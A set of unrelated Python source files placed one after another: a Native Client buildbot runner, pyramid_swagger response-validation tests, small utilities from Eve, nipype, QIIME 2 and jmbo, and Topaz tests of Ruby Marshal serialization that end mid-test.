              python + ' buildbot/buildbot_standard.py ' +
              mode + ' ' + real_arch + ' ' + libc + arch_flags)


def EscapeJson(data):
  return '"' + json.dumps(data).replace('"', r'\"') + '"'


def Main():
  builder = os.environ.get('BUILDBOT_BUILDERNAME')
  build_number = os.environ.get('BUILDBOT_BUILDNUMBER')
  slave_type = os.environ.get('BUILDBOT_SLAVE_TYPE')
  cmd = BOT_ASSIGNMENT.get(builder)
  if not cmd:
    sys.stderr.write('ERROR - unset/invalid builder name\n')
    sys.exit(1)

  env = os.environ.copy()

  # Don't write out .pyc files because in cases in which files move around or
  # the PYTHONPATH / sys.path change, old .pyc files can be mistakenly used.
  # This avoids the need for admin changes on the bots in this case.
  env['PYTHONDONTWRITEBYTECODE'] = '1'

  # Use .boto file from home-dir instead of buildbot supplied one.
  if 'AWS_CREDENTIAL_FILE' in env:
    del env['AWS_CREDENTIAL_FILE']
  env['BOTO_CONFIG'] = os.path.expanduser('~/.boto')
  env['GSUTIL'] = '/b/build/third_party/gsutil/gsutil'

  # When running from cygwin, we sometimes want to use a native python.
  # The native python will use the depot_tools version by invoking python.bat.
  if pynacl.platform.IsWindows():
    env['NATIVE_PYTHON'] = 'python.bat'
  else:
    env['NATIVE_PYTHON'] = 'python'

  if sys.platform == 'win32':
    # If the temp directory is not on the same drive as the working directory,
    # there can be random failures when cleaning up temp directories, so use
    # a directory on the current drive. Use __file__ here instead of os.getcwd()
    # because toolchain_main picks its working directories relative to __file__
    filedrive, _ = os.path.splitdrive(__file__)
    tempdrive, _ = os.path.splitdrive(env['TEMP'])
    if tempdrive != filedrive:
      env['TEMP'] = filedrive + '\\temp'
      env['TMP'] = env['TEMP']
      if not os.path.exists(env['TEMP']):
        os.mkdir(env['TEMP'])

  # Run through runtest.py to get upload of perf data.
  build_properties = {
      'buildername': builder,
      'mastername': 'client.nacl',
      'buildnumber': str(build_number),
  }
  factory_properties = {
      'perf_id': builder,
      'show_perf_results': True,
      'step_name': 'naclperf',  # Seems unused, but is required.
      'test_name': 'naclperf',  # Really "Test Suite"
  }
  # Locate the buildbot build directory by relative path, as it's absolute
  # location varies by platform and configuration.
  buildbot_build_dir = os.path.join(* [os.pardir] * 4)
  runtest = os.path.join(buildbot_build_dir, 'scripts', 'slave', 'runtest.py')
  # For builds with an actual build number, require that the script is present
  # (i.e. that we're run from an actual buildbot).
  if build_number is not None and not os.path.exists(runtest):
    raise Exception('runtest.py script not found at: %s\n' % runtest)
  cmd_exe = cmd.split(' ')[0]
  cmd_exe_ext = os.path.splitext(cmd_exe)[1]
  # Do not wrap these types of builds with runtest.py:
  # - tryjobs
  # - commands beginning with 'echo '
  # - batch files
  # - debug builders
  if not (slave_type == 'Trybot' or
          cmd_exe == echo or
          cmd_exe_ext == '.bat' or
          '-dbg' in builder):
    # Perf dashboards are now generated by output scraping that occurs in the
    # script runtest.py, which lives in the buildbot repository.
    # Non-trybot builds should be run through runtest, allowing it to upload
    # perf data if relevant.
    cmd = ' '.join([
        python, runtest,
        '--build-dir=src/out',
        '--results-url=https://chromeperf.appspot.com',
        '--annotate=graphing',
        '--no-xvfb',  # We provide our own xvfb invocation.
        '--factory-properties', EscapeJson(factory_properties),
        '--build-properties', EscapeJson(build_properties),
        cmd,
    ])

  print "%s runs: %s\n" % (builder, cmd)
  retcode = subprocess.call(cmd, env=env, shell=True)
  sys.exit(retcode)


if __name__ == '__main__':
  Main()

from contextlib import contextmanager
from _pytest.python import FixtureRequest

import mock
from mock import Mock
import pyramid.testing
from webob.multidict import MultiDict
import pyramid_swagger
import pyramid_swagger.tween
import pytest
import simplejson
from pyramid.config import Configurator
from pyramid.interfaces import IRoutesMapper
from pyramid.registry import Registry
from pyramid.response import Response
from pyramid.urldispatch import RoutesMapper
from webtest import AppError

from .request_test import test_app
from pyramid_swagger.exceptions import ResponseValidationError
from pyramid_swagger.ingest import compile_swagger_schema
from pyramid_swagger.ingest import get_resource_listing
from pyramid_swagger.tween import validation_tween_factory


class CustomResponseValidationException(Exception):
    pass


class EnhancedDummyRequest(pyramid.testing.DummyRequest):
    """
    pyramid.testing.DummyRequest doesn't support MultiDicts like the real
    pyramid.request.Request so this is the next best thing.
    """
    def __init__(self, **kw):
        super(EnhancedDummyRequest, self).__init__(**kw)
        self.GET = MultiDict(self.GET)
        # Make sure content_type attr exists is not passed in via **kw
        self.content_type = getattr(self, 'content_type', None)


@contextmanager
def validation_context(request, response=None):
    try:
        yield
    except Exception:
        raise CustomResponseValidationException


validation_ctx_path = 'tests.acceptance.response_test.validation_context'


def get_registry(settings):
    registry = Registry('testing')
    config = Configurator(registry=registry)
    if getattr(registry, 'settings', None) is None:
        config._set_settings(settings)
    registry.registerUtility(RoutesMapper(), IRoutesMapper)
    config.commit()
    return registry


def get_swagger_schema(schema_dir='tests/sample_schemas/good_app/'):
    return compile_swagger_schema(
        schema_dir,
        get_resource_listing(schema_dir, False)
    )


def _validate_against_tween(request, response=None, **overrides):
    """
    Acceptance testing helper for testing the validation tween with Swagger 1.2
    responses.

    :param request: pytest fixture
    :param response: standard fixture by default
    """
    def handler(request):
        return response or Response()

    settings = dict({
        'pyramid_swagger.swagger_versions': ['1.2'],
        'pyramid_swagger.enable_swagger_spec_validation': False,
        'pyramid_swagger.schema_directory': 'tests/sample_schemas/good_app/'},
        **overrides
    )
    settings['pyramid_swagger.schema12'] = get_swagger_schema()
    settings['pyramid_swagger.schema20'] = None
    registry = get_registry(settings)

    # Let's make request validation a no-op so we can focus our tests.
    with mock.patch.object(pyramid_swagger.tween, 'validate_request'):
        validation_tween_factory(handler, registry)(request)


def test_response_validation_enabled_by_default():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # Omit the logging_info key from the response. If response validation
    # occurs, we'll fail it.
    response = Response(
        body=simplejson.dumps({'raw_response': 'foo'}),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as excinfo:
        _validate_against_tween(request, response=response)
    assert "'logging_info' is a required property" in str(excinfo.value)


def test_500_when_response_is_missing_required_field():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # Omit the logging_info key from the response.
    response = Response(
        body=simplejson.dumps({'raw_response': 'foo'}),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as excinfo:
        _validate_against_tween(request, response=response)
    assert "'logging_info' is a required property" in str(excinfo.value)


def test_200_when_response_is_void_with_none_response():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample/nonstring/{int_arg}/{float_arg}/{boolean_arg}',
        params={'required_arg': 'test'},
        matchdict={'int_arg': '1', 'float_arg': '2.0', 'boolean_arg': 'true'},
    )
    response = Response(
        body=simplejson.dumps(None),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    _validate_against_tween(request, response=response)


def test_200_when_response_is_void_with_empty_response():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample/nonstring/{int_arg}/{float_arg}/{boolean_arg}',
        params={'required_arg': 'test'},
        matchdict={'int_arg': '1', 'float_arg': '2.0', 'boolean_arg': 'true'},
    )
    response = Response(body='{}')
    _validate_against_tween(request, response=response)


def test_500_when_response_arg_is_wrong_type():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    response = Response(
        body=simplejson.dumps({
            'raw_response': 1.0,
            'logging_info': {'foo': 'bar'}
        }),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as excinfo:
        _validate_against_tween(request, response=response)
    assert "1.0 is not of type 'string'" in str(excinfo.value)


def test_500_for_bad_validated_array_response():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample_array_response',
    )
    response = Response(
        body=simplejson.dumps([{"enum_value": "bad_enum_value"}]),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(ResponseValidationError) as excinfo:
        _validate_against_tween(request, response=response)
    assert "is not one of ['good_enum_value']" in str(excinfo.value)


def test_200_for_good_validated_array_response():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample_array_response',
    )
    response = Response(
        body=simplejson.dumps([{"enum_value": "good_enum_value"}]),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )

    _validate_against_tween(request, response=response)


def test_200_for_normal_response_validation():
    app = test_app(
        request=Mock(spec=FixtureRequest, param=['1.2']),
        **{'pyramid_swagger.enable_response_validation': True}
    )
    response = app.post_json('/sample', {'foo': 'test', 'bar': 'test'})
    assert response.status_code == 200


def test_200_skip_validation_for_excluded_path():
    # FIXME(#64): This test is broken and doesn't check anything.
    app = test_app(
        request=Mock(spec=FixtureRequest, param=['1.2']),
        **{'pyramid_swagger.exclude_paths': [r'^/sample/?']}
    )
    response = app.get(
        '/sample/path_arg1/resource',
        params={'required_arg': 'test'}
    )
    assert response.status_code == 200


def test_app_error_if_path_not_in_spec_and_path_validation_disabled():
    """If path missing and validation is disabled we want to let something else
    handle the error. TestApp throws an AppError, but Pyramid would throw a
    HTTPNotFound exception.
    """
    with pytest.raises(AppError):
        app = test_app(
            request=Mock(spec=FixtureRequest, param=['1.2']),
            **{'pyramid_swagger.enable_path_validation': False}
        )
        assert app.get('/this/path/doesnt/exist')


def test_response_validation_context():
    request = EnhancedDummyRequest(
        method='GET',
        path='/sample/path_arg1/resource',
        params={'required_arg': 'test'},
        matchdict={'path_arg': 'path_arg1'},
    )
    # Omit the logging_info key from the response.
    response = Response(
        body=simplejson.dumps({'raw_response': 'foo'}),
        headers={'Content-Type': 'application/json; charset=UTF-8'},
    )
    with pytest.raises(CustomResponseValidationException):
        _validate_against_tween(
            request,
            response=response,
            **{'pyramid_swagger.validation_context_path': validation_ctx_path}
        )

import ghcnpy

# Provide introduction
ghcnpy.intro()

# Print Latest Version
ghcnpy.get_ghcnd_version()

# Testing Search Capabilities
print("\nTESTING SEARCH CAPABILITIES")
ghcnpy.find_station("Asheville")

# Testing Search Capabilities
print("\nTESTING PULL CAPABILITIES")
outfile=ghcnpy.get_data_station("USW00003812")
print(outfile," has been downloaded")

# -*- coding: utf-8 -*-

"""
    eve.io.media
    ~~~~~~~~~~~~

    Media storage for Eve-powered APIs.

    :copyright: (c) 2014 by Nicola Iarocci.
    :license: BSD, see LICENSE for more details.
"""


class MediaStorage(object):
    """ The MediaStorage class provides a standardized API for storing files,
    along with a set of default behaviors that all other storage systems can
    inherit or override as necessary.

    ..versioneadded:: 0.3
    """

    def __init__(self, app=None):
        """
        :param app: the flask application (eve itself). This can be used by
        the class to access, amongst other things, the app.config object to
        retrieve class-specific settings.
        """
        self.app = app

    def get(self, id_or_filename):
        """ Opens the file given by name or unique id. Note that although the
        returned file is guaranteed to be a File object, it might actually be
        some subclass. Returns None if no file was found.
        """
        raise NotImplementedError

    def put(self, content, filename=None, content_type=None):
        """ Saves a new file using the storage system, preferably with the name
        specified. If there already exists a file with this name name, the
        storage system may modify the filename as necessary to get a unique
        name. Depending on the storage system, a unique id or the actual name
        of the stored file will be returned. The content type argument is used
        to appropriately identify the file when it is retrieved.

        .. versionchanged:: 0.5
           Allow filename to be optional (#414).
        """
        raise NotImplementedError

    def delete(self, id_or_filename):
        """ Deletes the file referenced by name or unique id. If deletion is
        not supported on the target storage system this will raise
        NotImplementedError instead
        """
        raise NotImplementedError

    def exists(self, id_or_filename):
        """ Returns True if a file referenced by the given name or unique id
        already exists in the storage system, or False if the name is available
        for a new file.
        """
        raise NotImplementedError

from django.utils.translation import ugettext as _
from django.db import models

from jmbo.models import ModelBase


class Superhero(ModelBase):
    name = models.CharField(max_length=256, editable=False)

    class Meta:
        verbose_name_plural = _("Superheroes")

# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
''' Processor functions for images '''
import numpy as np

def squeeze_image(img):
    ''' Return image, remove axes length 1 at end of image shape

    For example, an image may have shape (10,20,30,1,1).  In this case
    squeeze will result in an image with shape (10,20,30).  See doctests
    for further description of behavior.

    Parameters
    ----------
    img : ``SpatialImage``

    Returns
    -------
    squeezed_img : ``SpatialImage``
       Copy of img, such that data, and data shape have been squeezed,
       for dimensions > 3rd, and at the end of the shape list

    Examples
    --------
    >>> import nipype.externals.pynifti as nf
    >>> shape = (10,20,30,1,1)
    >>> data = np.arange(np.prod(shape)).reshape(shape)
    >>> affine = np.eye(4)
    >>> img = nf.Nifti1Image(data, affine)
    >>> img.get_shape()
    (10, 20, 30, 1, 1)
    >>> img2 = squeeze_image(img)
    >>> img2.get_shape()
    (10, 20, 30)

    If the data are 3D then last dimensions of 1 are ignored

    >>> shape = (10,1,1)
    >>> data = np.arange(np.prod(shape)).reshape(shape)
    >>> img = nf.ni1.Nifti1Image(data, affine)
    >>> img.get_shape()
    (10, 1, 1)
    >>> img2 = squeeze_image(img)
    >>> img2.get_shape()
    (10, 1, 1)

    Only *final* dimensions of 1 are squeezed

    >>> shape = (1, 1, 5, 1, 2, 1, 1)
    >>> data = data.reshape(shape)
    >>> img = nf.ni1.Nifti1Image(data, affine)
    >>> img.get_shape()
    (1, 1, 5, 1, 2, 1, 1)
    >>> img2 = squeeze_image(img)
    >>> img2.get_shape()
    (1, 1, 5, 1, 2)
    '''
    klass = img.__class__
    shape = img.get_shape()
    slen = len(shape)
    if slen < 4:
        return klass.from_image(img)
    for bdim in shape[3::][::-1]:
        if bdim == 1:
           slen-=1
        else:
            break
    if slen == len(shape):
        return klass.from_image(img)
    shape = shape[:slen]
    data = img.get_data()
    data = data.reshape(shape)
    return klass(data,
                 img.get_affine(),
                 img.get_header(),
                 img.extra)


def concat_images(images):
    ''' Concatenate images in list to single image, along last dimension '''
    n_imgs = len(images)
    img0 = images[0]
    i0shape = img0.get_shape()
    affine = img0.get_affine()
    header = img0.get_header()
    out_shape = (n_imgs, ) + i0shape
    out_data = np.empty(out_shape)
    for i, img in enumerate(images):
        if not np.all(img.get_affine() == affine):
            raise ValueError('Affines do not match')
        out_data[i] = img.get_data()
    out_data = np.rollaxis(out_data, 0, len(i0shape)+1)
    klass = img0.__class__
    return klass(out_data, affine, header)


# ----------------------------------------------------------------------------
# Copyright (c) 2016-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------

from qiime2.plugin import SemanticType

from ..plugin_setup import plugin
from . import AlphaDiversityDirectoryFormat


SampleData = SemanticType('SampleData', field_names='type')

AlphaDiversity = SemanticType('AlphaDiversity',
                              variant_of=SampleData.field['type'])

plugin.register_semantic_types(SampleData, AlphaDiversity)

plugin.register_semantic_type_to_format(
    SampleData[AlphaDiversity],
    artifact_format=AlphaDiversityDirectoryFormat
)

from ..base import BaseTopazTest


class TestMarshal(BaseTopazTest):
    def test_version_constants(self, space):
        w_res = space.execute("return Marshal::MAJOR_VERSION")
        assert space.int_w(w_res) == 4

        w_res = space.execute("return Marshal::MINOR_VERSION")
        assert space.int_w(w_res) == 8

        w_res = space.execute("return Marshal.dump('test')[0].ord")
        assert space.int_w(w_res) == 4

        w_res = space.execute("return Marshal.dump('test')[1].ord")
        assert space.int_w(w_res) == 8

    def test_dump_constants(self, space):
        w_res = space.execute("return Marshal.dump(nil)")
        assert space.str_w(w_res) == "\x04\b0"

        w_res = space.execute("return Marshal.dump(true)")
        assert space.str_w(w_res) == "\x04\bT"

        w_res = space.execute("return Marshal.dump(false)")
        assert space.str_w(w_res) == "\x04\bF"

    def test_load_constants(self, space):
        w_res = space.execute("return Marshal.load('\x04\b0')")
        assert w_res == space.w_nil

        w_res = space.execute("return Marshal.load('\x04\bT')")
        assert w_res == space.w_true

        w_res = space.execute("return Marshal.load('\x04\bF')")
        assert w_res == space.w_false

    def test_constants(self, space):
        w_res = space.execute("return Marshal.load(Marshal.dump(nil))")
        assert w_res == space.w_nil

        w_res = space.execute("return Marshal.load(Marshal.dump(true))")
        assert w_res == space.w_true

        w_res = space.execute("return Marshal.load(Marshal.dump(false))")
        assert w_res == space.w_false

    def test_dump_tiny_integer(self, space):
        w_res = space.execute("return Marshal.dump(5)")
        assert space.str_w(w_res) == "\x04\bi\n"

        w_res = space.execute("return Marshal.dump(100)")
        assert space.str_w(w_res) == "\x04\bii"

        w_res = space.execute("return Marshal.dump(0)")
        assert space.str_w(w_res) == "\x04\bi\x00"

        w_res = space.execute("return Marshal.dump(-1)")
        assert space.str_w(w_res) == "\x04\bi\xFA"

        w_res = space.execute("return Marshal.dump(-123)")
        assert space.str_w(w_res) == "\x04\bi\x80"

        w_res = space.execute("return Marshal.dump(122)")
        assert space.str_w(w_res) == "\x04\bi\x7F"

    def test_load_tiny_integer(self, space):
        w_res = space.execute("return Marshal.load('\x04\bi\n')")
        assert space.int_w(w_res) == 5

        w_res = space.execute("return Marshal.load('\x04\bii')")
        assert space.int_w(w_res) == 100

        #w_res = space.execute('return Marshal.load("\x04\bi\x00")')
        w_res = space.execute('return Marshal.load(Marshal.dump(0))')
        assert space.int_w(w_res) == 0

        w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
        assert space.int_w(w_res) == -1

        w_res = space.execute("return Marshal.load('\x04\bi\x80')")
        assert space.int_w(w_res) == -123

        w_res = space.execute("return Marshal.load('\x04\bi\x7F')")
        assert space.int_w(w_res) == 122

    def test_dump_array(self, space):
        w_res = space.execute("return Marshal.dump([])")
        assert space.str_w(w_res) == "\x04\b[\x00"

        w_res = space.execute("return Marshal.dump([nil])")
        assert space.str_w(w_res) == "\x04\b[\x060"

        w_res = space.execute("return Marshal.dump([nil, true, false])")
        assert space.str_w(w_res) == "\x04\b[\b0TF"

        w_res = space.execute("return Marshal.dump([1, 2, 3])")
        assert space.str_w(w_res) == "\x04\b[\x08i\x06i\x07i\x08"

        w_res = space.execute("return Marshal.dump([1, [2, 3], 4])")
        assert space.str_w(w_res) == "\x04\b[\bi\x06[\ai\ai\bi\t"

        w_res = space.execute("return Marshal.dump([:foo, :bar])")
        assert space.str_w(w_res) == "\x04\b[\a:\bfoo:\bbar"

    def test_load_array(self, space):
        #w_res = space.execute("return Marshal.load('\x04\b[\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump([]))")
        assert self.unwrap(space, w_res) == []

        w_res = space.execute("return Marshal.load('\x04\b[\x060')")
        assert self.unwrap(space, w_res) == [None]

        w_res = space.execute("return Marshal.load('\x04\b[\b0TF')")
        assert self.unwrap(space, w_res) == [None, True, False]

        w_res = space.execute("return Marshal.load('\x04\b[\x08i\x06i\x07i\x08')")
        assert self.unwrap(space, w_res) == [1, 2, 3]

        w_res = space.execute("return Marshal.load('\x04\b[\bi\x06[\ai\ai\bi\t')")
        assert self.unwrap(space, w_res) == [1, [2, 3], 4]

        w_res = space.execute("return Marshal.load('\x04\b[\a:\bfoo:\bbar')")
        assert self.unwrap(space, w_res) == ["foo", "bar"]

    def test_dump_symbol(self, space):
        w_res = space.execute("return Marshal.dump(:abc)")
        assert space.str_w(w_res) == "\x04\b:\babc"

        w_res = space.execute("return Marshal.dump(('hello' * 25).to_sym)")
        assert space.str_w(w_res) == "\x04\b:\x01}" + "hello" * 25

        w_res = space.execute("return Marshal.dump(('hello' * 100).to_sym)")
        assert space.str_w(w_res) == "\x04\b:\x02\xF4\x01" + "hello" * 100

    def test_load_symbol(self, space):
        w_res = space.execute("return Marshal.load('\x04\b:\babc')")
        assert space.symbol_w(w_res) == "abc"

        w_res = space.execute("return Marshal.load('\x04\b:\x01}' + 'hello' * 25)")
        assert space.symbol_w(w_res) == "hello" * 25

    def test_dump_hash(self, space):
        w_res = space.execute("return Marshal.dump({})")
        assert space.str_w(w_res) == "\x04\b{\x00"

        w_res = space.execute("return Marshal.dump({1 => 2, 3 => 4})")
        assert self.unwrap(space, w_res) == "\x04\b{\ai\x06i\ai\bi\t"

        w_res = space.execute("return Marshal.dump({1 => {2 => 3}, 4 => 5})")
        assert self.unwrap(space, w_res) == "\x04\b{\ai\x06{\x06i\ai\bi\ti\n"

        w_res = space.execute("return Marshal.dump({1234 => {23456 => 3456789}, 4 => 5})")
        assert self.unwrap(space, w_res) == "\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n"

    def test_load_hash(self, space):
        #w_res = space.execute("return Marshal.load('\x04\b{\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump({}))")
        assert self.unwrap(space, w_res) == {}

        w_res = space.execute("return Marshal.load('\x04\b{\ai\x06i\ai\bi\t')")
        assert self.unwrap(space, w_res) == {1: 2, 3: 4}

        w_res = space.execute("return Marshal.load('\x04\b{\ai\x06{\x06i\ai\bi\ti\n')")
        assert self.unwrap(space, w_res) == {1: {2: 3}, 4: 5}

        w_res = space.execute("return Marshal.load('\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n')")
        assert self.unwrap(space, w_res) == {1234: {23456: 3456789}, 4: 5}

    def test_dump_integer(self, space):
        w_res = space.execute("return Marshal.dump(123)")
        assert space.str_w(w_res) == "\x04\bi\x01{"

        w_res = space.execute("return Marshal.dump(255)")
        assert space.str_w(w_res) == "\x04\bi\x01\xFF"

        w_res = space.execute("return Marshal.dump(256)")
        assert space.str_w(w_res) == "\x04\bi\x02\x00\x01"

        w_res = space.execute("return Marshal.dump(2 ** 16 - 2)")
        assert space.str_w(w_res) == "\x04\bi\x02\xFE\xFF"

        w_res = space.execute("return Marshal.dump(2 ** 16 - 1)")
        assert space.str_w(w_res) == "\x04\bi\x02\xFF\xFF"

        w_res = space.execute("return Marshal.dump(2 ** 16)")
        assert space.str_w(w_res) == "\x04\bi\x03\x00\x00\x01"

        w_res = space.execute("return Marshal.dump(2 ** 16 + 1)")
        assert space.str_w(w_res) == "\x04\bi\x03\x01\x00\x01"

        w_res = space.execute("return Marshal.dump(2 ** 30 - 1)")
        assert space.str_w(w_res) == "\x04\bi\x04\xFF\xFF\xFF?"

        # TODO: test tooo big numbers (they give a warning and inf)

    def test_load_integer(self, space):
        w_res = space.execute("return Marshal.load('\x04\bi\x01{')")
        assert space.int_w(w_res) == 123

        w_res = space.execute("return Marshal.load('\x04\bi\x01\xFF')")
        assert space.int_w(w_res) == 255

        #w_res = space.execute("return Marshal.load('\x04\bi\x02\x00\x01')")
        w_res = space.execute("return Marshal.load(Marshal.dump(256))")
        assert space.int_w(w_res) == 256

        w_res = space.execute("return Marshal.load('\x04\bi\x02\xFE\xFF')")
        assert space.int_w(w_res) == 2 ** 16 - 2

        w_res = space.execute("return Marshal.load('\x04\bi\x02\xFF\xFF')")
        assert space.int_w(w_res) == 2 ** 16 - 1

        #w_res = space.execute("return Marshal.load('\x04\bi\x03\x00\x00\x01')")
        w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16))")
        assert space.int_w(w_res) == 2 ** 16

        #w_res = space.execute("return Marshal.load('\x04\bi\x03\x01\x00\x01')")
        w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16 + 1))")
        assert space.int_w(w_res) == 2 ** 16 + 1

        w_res = space.execute("return Marshal.load('\x04\bi\x04\xFF\xFF\xFF?')")
        assert space.int_w(w_res) == 2 ** 30 - 1

    def test_dump_negative_integer(self, space):
        w_res = space.execute("return Marshal.dump(-1)")
        assert space.str_w(w_res) == "\x04\bi\xFA"

        w_res = space.execute("return Marshal.dump(-123)")
        assert space.str_w(w_res) == "\x04\bi\x80"

        w_res = space.execute("return Marshal.dump(-124)")
        assert space.str_w(w_res) == "\x04\bi\xFF\x84"

        w_res = space.execute("return Marshal.dump(-256)")
        assert space.str_w(w_res) == "\x04\bi\xFF\x00"

        w_res = space.execute("return Marshal.dump(-257)")
        assert space.str_w(w_res) == "\x04\bi\xFE\xFF\xFE"

        w_res = space.execute("return Marshal.dump(-(2 ** 30))")
        assert space.str_w(w_res) == "\x04\bi\xFC\x00\x00\x00\xC0"

    def test_load_negative_integer(self, space):
        w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
        assert space.int_w(w_res) == -1

        w_res = space.execute("return Marshal.load('\x04\bi\x80')")
        assert space.int_w(w_res) == -123

        w_res = space.execute("return Marshal.load('\x04\bi\xFF\x84')")
        assert space.int_w(w_res) == -124

        #w_res = space.execute("return Marshal.load('\x04\bi\xFF\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-256))")
        assert space.int_w(w_res) == -256

        w_res = space.execute("return Marshal.load('\x04\bi\xFE\xFF\xFE')")
        assert space.int_w(w_res) == -257

        #w_res = space.execute("return Marshal.load('\x04\bi\xFE\x00\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 16)))")
        assert space.int_w(w_res) == -(2 ** 16)

        w_res = space.execute("return Marshal.load('\x04\bi\xFD\xFF\xFF\xFE')")
        assert space.int_w(w_res) == -(2 ** 16 + 1)

        #w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 24)))")
        assert space.int_w(w_res) == -(2 ** 24)

        w_res = space.execute("return Marshal.load('\x04\bi\xFC\xFF\xFF\xFF\xFE')")
        assert space.int_w(w_res) == -(2 ** 24 + 1)

        #w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00\xC0')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 30)))")
        assert space.int_w(w_res) == -(2 ** 30)

    def test_dump_float(self, space):
        w_res = space.execute("return Marshal.dump(0.0)")
        assert space.str_w(w_res) == "\x04\bf\x060"

        w_res = space.execute("return Marshal.dump(0.1)")
        assert space.str_w(w_res) == "\x04\bf\b0.1"

        w_res = space.execute("return Marshal.dump(1.0)")
        assert space.str_w(w_res) == "\x04\bf\x061"

        w_res = space.execute("return Marshal.dump(1.1)")
        assert space.str_w(w_res) == "\x04\bf\b1.1"

        w_res = space.execute("return Marshal.dump(1.001)")
        assert space.str_w(w_res) == "\x04\bf\n1.001"

        #w_res = space.execute("return Marshal.dump(123456789.123456789)")
        #assert space.str_w(w_res) == "\x04\bf\x17123456789.12345679"

        #w_res = space.execute("return Marshal.dump(-123456789.123456789)")
        #assert space.str_w(w_res) == "\x04\bf\x18-123456789.12345679"

        #w_res = space.execute("return Marshal.dump(-0.0)")
        #assert space.str_w(w_res) == "\x04\bf\a-0"

    def test_load_float(self, space):
        w_res = space.execute("return Marshal.load('\x04\bf\x060')")
        assert space.float_w(w_res) == 0.0

        w_res = space.execute("return Marshal.load('\x04\bf\b0.1')")
        assert space.float_w(w_res) == 0.1

        w_res = space.execute("return Marshal.load('\x04\bf\x061')")
        assert space.float_w(w_res) == 1.0

        w_res = space.execute("return Marshal.load('\x04\bf\b1.1')")
        assert space.float_w(w_res) == 1.1

        w_res = space.execute("return Marshal.load('\x04\bf\n1.001')")
        assert space.float_w(w_res) == 1.001

        #w_res = space.execute("return Marshal.load('\x04\bf\x17123456789.12345679')")
        #assert space.float_w(w_res) == 123456789.123456789

        #w_res = space.execute("return Marshal.load('\x04\bf\x18-123456789.12345679')")
        #assert space.float_w(w_res) == -123456789.123456789

        #w_res = space.execute("return Marshal.load('\x04\bf\a-0')")
        #assert repr(space.float_w(w_res)) == repr(-0.0)

    def test_dump_string(self, space):
        w_res = space.execute("return Marshal.dump('')")
        assert space.str_w(w_res) == "\x04\bI\"\x00\x06:\x06ET"

        w_res = space.execute("return Marshal.dump('abc')")
        assert space.str_w(w_res) == "\x04\bI\"\babc\x06:\x06ET"

        w_res = space.execute("return Marshal.dump('i am a longer string')")
        assert space.str_w(w_res) == "\x04\bI\"\x19i am a longer string\x06:\x06ET"

    def test_load_string(self, space):
        #w_res = space.execute("return Marshal.load('\x04\bI\"\x00\x06:\x06ET')")
        w_res = space.execute("return Marshal.load(Marshal.dump(''))")
        assert space.str_w(w_res) == ""

        w_res = space.execute("return Marshal.load('\x04\bI\"\babc\x06:\x06ET')")
        assert space.str_w(w_res) == "abc"

        w_res = space.execute("return Marshal.load('\x04\bI\"\x19i am a longer string\x06:\x06ET')")
        assert space.str_w(w_res) == "i am a longer string"

    def test_array(self, space):
        w_res = space.execute("return Marshal.load(Marshal.dump([1, 2, 3]))")
        assert self.unwrap(space, w_res) == [1, 2, 3]

        w_res = space.execute("return Marshal.load(Marshal.dump([1, [2, 3], 4]))")
        assert self.unwrap(space, w_res) == [1, [2, 3], 4]

        w_res = space.execute("return Marshal.load(Marshal.dump([130, [2, 3], 4]))")
        assert self.unwrap(space, w_res) == [130, [2, 3], 4]

        w_res = space.execute("return Marshal.load(Marshal.dump([-10000, [2, 123456], -9000]))")
        assert self.unwrap(space, w_res) == [-10000, [2, 123456], -9000]

        w_res = space.execute("return Marshal.load(Marshal.dump([:foo, :bar]))")
        assert self.unwrap(space, w_res) == ["foo", "bar"]

        w_res = space.execute("return Marshal.load(Marshal.dump(['foo', 'bar']))")
        assert self.unwrap(space, w_res) == ["foo", "bar"]

    def test_incompatible_format(self, space):
        with self.raises(
            space,
            "TypeError",
            "incompatible marshal file format (can't be read)\n"
            "format version 4.8 required; 97.115 given"
        ):
            space.execute("Marshal.load('asd')")

    def test_short_data(self, space):
        with self.raises(space, "ArgumentError", "marshal data too short"):
            space.execute("Marshal.load('')")

    def test_parameters(self, space):
        with self.raises(space, "TypeError", "instance of IO needed"):
            space.execute("Marshal.load(4)")

    def test_io(self, space, tmpdir):
        f = tmpdir.join("testfile")

        w_res = space.execute("""
        Marshal.dump('hallo', File.new('%s', 'wb'))
        file = File.open('%s', 'rb')
